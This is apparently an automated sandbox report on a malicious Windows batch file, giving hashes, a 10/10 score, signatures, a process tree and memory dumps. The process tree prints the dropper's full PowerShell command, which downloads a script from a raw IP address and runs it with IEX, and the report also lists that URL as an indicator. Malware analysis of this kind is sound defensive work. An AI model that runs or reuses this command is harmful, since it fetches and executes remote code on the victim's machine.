Analysis
-
max time kernel
146s -
max time network
89s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
12-07-2020 22:10
General
-
Target
f012b64a4c409c683d9fb217954bb81e.bat
-
Size
220B
-
MD5
3630e6bfeceaf5ae9f0fe776b8146e0b
-
SHA1
233dfd6ce74130dd5c4fea4cfde910b51544c5fd
-
SHA256
4af01116ea53d684aab434e8d65d4fd28822df7f13ada9a7a0a80c8f188fdf9e
-
SHA512
677811903d0bb197ccd3a66b02c1b5c14cd9956cc7668fa8ead565b25941ba3531bc00b6aebbdfc8a3a600bd318f0c1e5fe80c7f421243c6f3c068f81b7ef62a
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/f012b64a4c409c683d9fb217954bb81e
Signatures
-
Suspicious use of WriteProcessMemory 3 IoCs
-
Program crash 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\f012b64a4c409c683d9fb217954bb81e.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/f012b64a4c409c683d9fb217954bb81e');Invoke-CSLQTFNOIPZFU;Start-Sleep -s 10000"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/516-0-0x0000000000000000-mapping.dmp
-
memory/516-2-0x0000000000000000-mapping.dmp
-
memory/516-3-0x0000000000000000-mapping.dmp
-
memory/516-5-0x0000000000000000-mapping.dmp
-
memory/516-4-0x0000000000000000-mapping.dmp
-
memory/516-6-0x0000000000000000-mapping.dmp
-
memory/516-7-0x0000000000000000-mapping.dmp
-
memory/920-1-0x0000000004B90000-0x0000000004B91000-memory.dmpFilesize
4KB
-
memory/920-8-0x00000000051C0000-0x00000000051C1000-memory.dmpFilesize
4KB